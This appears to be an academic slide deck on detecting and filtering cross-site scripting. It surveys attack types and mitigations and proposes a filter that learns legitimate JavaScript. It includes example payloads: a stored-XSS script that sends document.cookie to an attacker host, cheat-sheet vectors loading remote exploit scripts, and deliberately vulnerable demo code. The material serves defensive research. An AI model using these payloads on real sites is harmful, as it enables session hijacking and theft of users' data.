Detecting and filtering XSS using Positive Security Logic

Ofer Rotberg, David Movshovitz

Web Application Architecture: Text Book vs. Real World

XSS Background
• “Today, over 70% of attacks come at the ‘Application Layer’, not the network or system layer.” - Gartner Group
• XSS is rated #1 among CVE entries (publicly reported vulnerabilities).
• Very simple to perform.
• A plethora of freely available web applications exists; much of the code is alpha or beta, written by inexperienced programmers.
• Every input has the potential to be an attack vector.
• To (really) fix the problem, the code must be changed.
• http://xssed.com/archive
[Source: Vulnerability Type Distributions in CVE, Document version: 1.1, Date: May 22, 2007 (http://cwe.mitre.org/documents/vuln-trends/index.html)]

Some more interesting results… Become a hacker? Source: “WhiteHat Website Security Statistic Reports”, Dec 2008

History repeats itself… Source: http://jeremiahgrossman.blogspot.com/2008/12/history-repeating-itself.html

3 Types of XSS
• Reflected (Non-Persistent): a script embedded in the request is ‘reflected’ in the response.
• Stored (Persistent): the attacker’s input is stored and played back in later page views.
• DOM-Based (Local): the problem exists within a page's (legitimate) client-side script itself.

Reflected XSS
• Request: http://www.website.com/index.php?name=Jim
• Response: <html> <body> Hello, Jim ...
• Request: http://www.website.com/index.php?name=Jim<script>alert("XSS")</script>
• Response: <html> <body> Hello, Jim <script>alert("XSS")</script> ...
• The browser assumes the server doesn’t send malicious content:
  • Parses the HTML and builds the DOM.
  • Fetches resources and executes them.
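The reflected flow above can be sketched in a few lines of Python. This is only an illustration: `render_greeting` is a hypothetical stand-in for the `index.php` page on the slide, and it is vulnerable on purpose because it copies the `name` parameter into the HTML without any encoding.

```python
def render_greeting(name: str) -> str:
    """Hypothetical stand-in for index.php: the parameter is pasted in as-is."""
    return f"<html> <body> Hello, {name} ..."

# Benign request: ?name=Jim
benign = render_greeting("Jim")

# Malicious request: the script rides along in the same parameter
attack = render_greeting('Jim<script>alert("XSS")</script>')

print(benign)
print(attack)
```

The second response contains a live `<script>` element, which the browser will execute because it cannot tell it apart from markup the site meant to send.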

Stored XSS
• Trudy posts the following text on a message board: Great message! <script>var img=new Image(); img.src="http://www.attacker.com/CookieStealer/WebForm1.aspx?s="+document.cookie;</script>
• When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy.
• Example: the MySpace.com virus.

DOM-Based XSS
• First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml)
• Benign URL: http://victim/promo?product_id=100&title=Last+Chance
• Attack URL: http://victim/promo?product_id=100&title=Foo#<SCRIPT>alert('XSS')</SCRIPT>
• Vulnerable client-side script in the page:
<script>
var url = window.location.href;
var pos = url.indexOf("title=") + 6;
var len = url.length;
var title_string = url.substring(pos, len);
document.write(title_string);
</script>
DEMO
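Why a server-side filter misses this attack can be shown with a small Python sketch. It assumes standard URL handling: the part after `#` (the fragment) stays in the browser and is not part of the HTTP request. The helper names `server_view` and `client_title` are hypothetical; `client_title` mirrors the substring logic of the page script above.

```python
from urllib.parse import urlsplit

ATTACK_URL = "http://victim/promo?product_id=100&title=Foo#<SCRIPT>alert('XSS')</SCRIPT>"

def server_view(url: str) -> str:
    """What reaches the server: path and query, never the fragment."""
    parts = urlsplit(url)
    return parts.path + "?" + parts.query

def client_title(url: str) -> str:
    """Mirror of the page script: everything after 'title=' in the full URL."""
    pos = url.index("title=") + len("title=")
    return url[pos:]

print(server_view(ATTACK_URL))
print(client_title(ATTACK_URL))
```

The server sees an ordinary request, while the client-side script writes the payload into the document.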

DOM XSS DEMO
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<script language="JavaScript">
var visitor_name = prompt("What is your name?", "");
</script>
</head>
<body>
<script language="JavaScript">
document.write("Welcome " + visitor_name + " How are you?");
</script>
</body>
</html>

Current Approaches for (Web) Application Security
Source-code analyzers (white box)
• Static: run simple text-based searches for strings (e.g. strcpy).
• Dynamic: construct all possible runtime function call stacks and attempt to determine whether a call (to strcpy, for example) can be reached by data received as input from the user or the environment.
• Pros:
  • Operate on source code, thus can be used by developers.
  • Integrate tightly into the development phase.
  • Pinpoint the problems (where to fix).
• Cons:
  • Developers must understand security.
  • Language specific.

Current Approaches for (Web) Application Security (cont.)
Web application scanners (black box)
• Fully automated or manual (see David’s slides).
• Automated login.
• Infinite web sites.
• How does the scanner know if a logout has occurred?
• Multi-page business processes utilizing HTML forms.
• Web applications are constantly changing.

Current Approaches for (Web) Application Security (cont.)
Web Application Firewalls (WAF)
• Often called “deep packet inspection firewalls”.
• Examine every request/response within the HTTP, SOAP, XML-RPC, and Web service layers.
• Focus on the request, so stored XSS is a problem.
• Filtering approaches:
  • Misuse based (negative model)
    • Novel attacks?
    • False positives if the system configuration or environment changes.
    • False negatives when using a negative model.
    • Large deviations from one web application to another (signature per application).
  • Anomaly based
    • Model “normal” traffic and find statistical deviations.
    • False positive rate.
    • Unproven theory.
    • Training set might include attacks.

HTTP vs. Network Anomaly Detection
• The stateless nature of HTTP
  • Most existing attacks are only one request long.
  • In network-level attacks, an attacker might check whether a vulnerability is likely to exist before attempting to exploit it.
• The non-stationary nature of web servers
  • Web site content changes rapidly.
  • Changes in content imply changes in the HTTP requests.
• HTTP requests are variable length
  • Any learning algorithm that requires fixed-length input, such as a neural net, will not work.
• Training data for anomaly detection is unbalanced
  • Many algorithms require similar amounts of normal and abnormal data.
• These problems eliminate many algorithms that have been successful before.

(Simple) Mitigation Techniques
• Disable JS (…and also Flash, ActiveX, Java Applets…)
  • But Web 2.0 is based on AJAX.
• Netscape SOP (Same Origin Policy)
  • A script may only read or modify content that belongs to its own origin (same protocol, host, and port).
  • …can be easily bypassed (<IMG src = http://attacker.com…)
  • What about mashups? Reuse of code? External resources?
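The origin comparison behind the Same Origin Policy can be sketched as follows. This is a simplified Python illustration, not a browser's actual implementation: the helper names `origin` and `same_origin` and the `DEFAULT_PORTS` table are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumed default ports, so that http://host and http://host:80 compare equal
DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url: str) -> tuple:
    """Reduce a URL to its (scheme, host, port) triple."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)

def same_origin(a: str, b: str) -> bool:
    """True when both URLs share scheme, host, and port."""
    return origin(a) == origin(b)

print(same_origin("http://www.website.com/a", "http://www.website.com:80/b"))
print(same_origin("http://www.website.com/", "http://attacker.com/"))
```

Note that this check governs what a script may read. It does not stop the page from issuing a request to another origin, for example through an image source, which is the bypass mentioned on the slide.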

(Simple) Mitigation Techniques (cont.)
• Encode/escape user input (in request/response)
  • Encode all user-supplied HTML special characters, thereby preventing them from being interpreted as HTML.
  • But… many modern web applications permit HTML input.
  • Libraries: MS .NET Anti-XSS library, OWASP PHP Anti-XSS library.
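A minimal sketch of output encoding, using Python's standard `html.escape` as a stand-in for the libraries named on the slide. The `greet` function is hypothetical and reuses the greeting page from the reflected XSS example.

```python
import html

def greet(name: str) -> str:
    """Encode HTML special characters before placing user input in the page."""
    return "<html> <body> Hello, " + html.escape(name, quote=True) + " ..."

encoded = greet('Jim<script>alert("XSS")</script>')
print(encoded)
```

The payload now arrives as inert text (`&lt;script&gt;…`), which also shows the limitation from the slide: an application that wants to accept real HTML from users cannot simply escape everything.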

(Simple) Mitigation Techniques (cont.)
• Input validation
  • Positive security model.
  • Check all input for length, type, syntax, and business rules before accepting the data to be displayed or stored.
• Protect against cookie stealing
  • Tie the cookie to the client IP.
  • HTTP-Only cookie: the cookie is unavailable to JS.
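Both ideas can be sketched with the Python standard library. The validation rule for a "name" field (1 to 32 characters, letters, spaces, hyphens, apostrophes) is an assumption chosen for illustration, as are the helper names and the cookie name `session`.

```python
import re
from http.cookies import SimpleCookie

# Hypothetical rule for a "name" field: starts with a letter, at most 32
# characters, and only letters, spaces, hyphens, or apostrophes.
NAME_RULE = re.compile(r"[A-Za-z][A-Za-z '\-]{0,31}")

def is_valid_name(value: str) -> bool:
    """Positive model: accept only what the rule describes, reject the rest."""
    return NAME_RULE.fullmatch(value) is not None

def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie header whose cookie is hidden from page scripts."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    return cookie.output()

print(is_valid_name("Jim"))
print(is_valid_name('Jim<script>alert("XSS")</script>'))
print(session_cookie_header("abc123"))
```

The validator never enumerates attack strings; anything outside the described shape is rejected, which is the positive model in miniature.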

The filtering problem
• Naive approach: remove all <script> tags from the input.
• There are many different ways to execute scripts in an HTML page (XSS Cheat Sheet):
  • <script src="http://bad.example.org/exploit.js"></script>
  • <img src="javascript:alert('XSS');">
  • <iframe src='vbscript:alert("XSS")'>
  • <body onload="alert('XSS');">
  • <link rel="stylesheet" href="http://bad.example.org/exploit.css">
  • <div id="mycode" expr="alert('hah!')" style="background:url('java\nscript:eval(document.all.mycode.expr)')">
• Input validation is hard:
  • There are many different ways to represent the same character in HTML.
  • Browsers tend to be “forgiving”.
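The weakness of the negative approach can be demonstrated with a short Python sketch. The filter below is a deliberately naive, hypothetical implementation of "remove all script tags"; it is run against some of the vectors listed on the slide.

```python
import re

# Naive negative filter: delete <script ...>...</script> elements only
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)

def strip_script_tags(markup: str) -> str:
    return SCRIPT_TAG.sub("", markup)

VECTORS = [
    '<script src="http://bad.example.org/exploit.js"></script>',
    "<img src=\"javascript:alert('XSS');\">",
    "<iframe src='vbscript:alert(\"XSS\")'>",
    "<body onload=\"alert('XSS');\">",
]

# Vectors that pass through the filter unchanged
survivors = [v for v in VECTORS if strip_script_tags(v) == v]
print(len(survivors), "of", len(VECTORS), "vectors survive the filter")
```

Only the first vector is removed; the others carry script through attributes and URL schemes that the filter never looks at.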

The filtering problem (cont.)

Tricky Scripts
• JS permits invoking code within code using eval():
  • eval("x=10;y=20;document.write(x*y)")
  • temp=eval("document.myForm." + fieldList[i]);
  • eval(xmlhttp.responseText);
• JS writes new HTML elements with new JS:
  • .innerHTML, document.write()
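One possible way to handle such scripts is to flag them for closer inspection, since their runtime behavior cannot be judged from the text alone. The following Python sketch is a rough heuristic, not a method taken from the slides; the pattern and the name `uses_dynamic_code` are assumptions.

```python
import re

# Text-level heuristic for constructs that create code or markup at runtime
DYNAMIC_SINKS = re.compile(
    r"\beval\s*\(|\bdocument\.write(?:ln)?\s*\(|\.innerHTML\b"
)

def uses_dynamic_code(script: str) -> bool:
    """True if the script text mentions eval(), document.write(), or innerHTML."""
    return DYNAMIC_SINKS.search(script) is not None

print(uses_dynamic_code("eval(xmlhttp.responseText);"))
print(uses_dynamic_code("var x = 10;"))
```

A textual match like this can be evaded by obfuscation, so it is at best a first-pass signal.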

Related Work
Client-side solutions
• Engin Kirda, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic, “Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks” (2006)
  • A client-side web proxy that analyzes all internal and external links embedded in Web pages.
  • Noxes identifies an unrecognized external link as an XSS attack.
  • Noxes focuses only on XSS attacks aimed at stealing credentials.

Related Work (cont.)
Query anomaly analysis
• Christopher Kruegel, Giovanni Vigna, and William Robertson, “A multi-model approach to the detection of web-based attacks” (2005)
DFA
• Ingham, Somayaji, Burge, and Forrest, “Learning DFA representations of HTTP for protecting web applications” (2006)

Related Work (cont.)
Web response analysis
• Bisht and Venkatakrishnan, “XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks” (July 2008).

XSS-Guard example

Related Work (cont.)
Johns, Engelmann and Posegga, “XSSDS: Server-side Detection of Cross-site Scripting Attacks” (Dec 2008).
• Reflected: given a set of parameters P = {p1, p2, ..., pm} and a set of scripts S = {s1, s2, ..., sn}, find all matches between P and S in which pi was used to define parts of sj.
• Stored:
  • Static scripts: simple.
  • Dynamic scripts:
    • Normalize constants (strings, numbers, and regular expressions).
    • Varying code blocks: variant script.
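The reflected case can be illustrated with a simplified Python sketch. It uses plain substring search between parameter values and scripts, which is an assumption made for brevity and not the matching algorithm of the cited paper; the `min_len` threshold and the function name are likewise hypothetical.

```python
def reflected_matches(params: dict, scripts: list, min_len: int = 8) -> list:
    """Return (parameter name, script index) pairs where the value occurs in the script."""
    matches = []
    for name, value in params.items():
        if len(value) < min_len:
            continue  # very short values would match by coincidence
        for j, script in enumerate(scripts):
            if value in script:
                matches.append((name, j))
    return matches

params = {"name": 'alert("XSS")', "id": "42"}
scripts = ["var a = 42;", 'alert("XSS")']
print(reflected_matches(params, scripts))
```

Here the `name` parameter is found inside the second script of the response, which marks it as a likely reflected injection, while the short `id` value is ignored.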

Related Work (cont.)
Johns, Engelmann and Posegga, “XSSDS: Server-side Detection of Cross-site Scripting Attacks” (Dec 2008): results

Proposed Model
• Positive security logic.
  • All traffic is illegal unless known to be legal.
• HTML response = collection of JavaScript nodes.
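A minimal Python sketch of this idea, under stated assumptions: the slides do not say how JS nodes are stored or compared, so the SHA-256 fingerprints, the `ScriptCollector` class, and the `learn` / `is_legal` helpers below are all hypothetical. Python's standard `html.parser` stands in for the extraction step.

```python
import hashlib
from html.parser import HTMLParser

class ScriptCollector(HTMLParser):
    """Collects inline <script> bodies, script src URLs, and on* handlers."""
    def __init__(self):
        super().__init__()
        self.nodes = []
        self._buffer = None  # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        for key, value in attrs:
            if value and (key.startswith("on") or (tag == "script" and key == "src")):
                self.nodes.append(key + "=" + value)
        if tag == "script":
            self._buffer = []

    def handle_data(self, data):
        if self._buffer is not None:
            self._buffer.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buffer is not None:
            body = "".join(self._buffer).strip()
            if body:
                self.nodes.append(body)
            self._buffer = None

def js_nodes(page: str) -> set:
    """Fingerprint every JavaScript node found in an HTML response."""
    collector = ScriptCollector()
    collector.feed(page)
    collector.close()
    return {hashlib.sha256(n.encode("utf-8")).hexdigest() for n in collector.nodes}

def learn(pages) -> set:
    """Learning phase: the union of all JS nodes seen in trusted pages."""
    known = set()
    for page in pages:
        known |= js_nodes(page)
    return known

def is_legal(page: str, known: set) -> bool:
    """Detection phase: a response is legal only if every JS node is known."""
    return js_nodes(page) <= known

known = learn(["<html><body>Hello, Jim <script>var x = 1;</script></body></html>"])
print(is_legal("<html><body>Hello, Bob <script>var x = 1;</script></body></html>", known))
print(is_legal('<html><body>Hello <script>alert("XSS")</script></body></html>', known))
```

A page with different text but the same scripts passes, while any unknown script or event handler makes the response illegal.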

Model Benefits
• Performance: “light” JS parsing.
• Generic: targets all types of XSS.
  • Even DOM-Based XSS could be mitigated if the web proxy is deployed on the client side.
• Fast convergence: short learning period.
  • The number of JS nodes is bounded.
  • Most JS nodes appear in every page (“building blocks”).
• The JS nodes DB is transportable.
  • Distributed learning.
• Can detect some attacks even if the JS didn’t run.

Implementation
• Learn web sites:
  • Crawl the web site using websphinx (http://www.cs.cmu.edu/~rcm/websphinx/#about).
  • Produce static pages and dynamic pages using a random fuzzer.
• JavaScript extraction:
  • Now: using HTMLParser (http://htmlparser.sourceforge.net/).
  • Future: hook into the Mozilla JS extraction engine?
• JavaScript code normalization:
  • Using Java RegEx.
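The normalization step can be sketched with regular expressions. The slides mention Java RegEx; the Python version below is only an illustration, and the exact patterns and the `STR` / `NUM` placeholders are assumptions. It ignores comments and regular-expression literals.

```python
import re

# Single- or double-quoted string literals, allowing backslash escapes
STRING_LITERAL = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'')
# Standalone integer or decimal literals (digits inside identifiers are left alone)
NUMBER_LITERAL = re.compile(r"\b\d+(?:\.\d+)?\b")
WHITESPACE = re.compile(r"\s+")

def normalize(script: str) -> str:
    """Replace constants with placeholders so script variants compare equal."""
    script = STRING_LITERAL.sub("STR", script)
    script = NUMBER_LITERAL.sub("NUM", script)
    return WHITESPACE.sub(" ", script).strip()

print(normalize('var user = "Jim";  var id = 42;'))
print(normalize("var user = 'Bob'; var id = 7;"))
```

Two scripts that differ only in their per-user constants normalize to the same text, so the learned set stays small even for dynamically generated pages.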

Challenges
• Attacks are browser specific.
• Handling special instructions (e.g. eval()).
• Attacks against the model:
  • document.write(“…”);
• Performance.

Current Results - False Positive Rate
False Positive Rate ≡ (# learned URLs with new scripts) / (# URLs in detection phase)
Test methodology:
• Crawl the web site to create a pool of URLs (~150 URLs).
• Generate random query URLs using a fuzzer.
• Learn a percentage of the total URLs (randomly picked).
• Detect on a percentage of the total URLs (randomly picked).
• Ignore “attacks” from unlearned URLs.
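The false positive rate defined above could be computed as in the following Python sketch. It rests on one reading of the slide, stated here as an assumption: a script counts as "new" when it is absent from the whole learned script DB, and the denominator is every URL visited in the detection phase. The data layout (URL mapped to a set of script fingerprints) and the function name are hypothetical.

```python
def false_positive_rate(learned: dict, detected: dict) -> float:
    """learned/detected map URL -> set of script fingerprints seen in that phase."""
    if not detected:
        return 0.0
    known_scripts = set().union(*learned.values())
    flagged = 0
    for url, scripts in detected.items():
        if url not in learned:
            continue  # "attacks" from unlearned URLs are ignored
        if scripts - known_scripts:
            flagged += 1  # a learned URL produced a script the DB has not seen
    return flagged / len(detected)

learned = {"/a": {"s1", "s2"}, "/b": {"s1"}}
detected = {"/a": {"s1"}, "/b": {"s1", "s3"}, "/c": {"s9"}, "/d": {"s2"}}
print(false_positive_rate(learned, detected))
```

In this toy data only `/b` is a learned URL that shows an unknown script, so one of the four detection-phase URLs counts as a false positive.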

URL FP Rate w/o Normalization

Script FP Rate w/o Normalization

Current Results - False Negative Rate
False Negative Rate ≡ (# Attacks Not Detected) / (# Attacks Injected)
Test methodology:
• Find a real vulnerable web application (http://xssed.com).
• Create a pool of legitimate URLs using a benign fuzzer.
• Create a pool of attack URLs using XSS cheat sheet payloads.
• Learn the script DB.
• Detect attacks.

FN Results

Deployment Options

Further Work
• Efficient implementation to increase performance
• Code clone detection
• Future applications
  • Application JS profile
  • JS cache
• Deployment options
  • ISP, Enterprise, Client.
• Other fields:
  • JS worm propagation.
  • Mash-ups.
  • AJAX security.

Thank You!
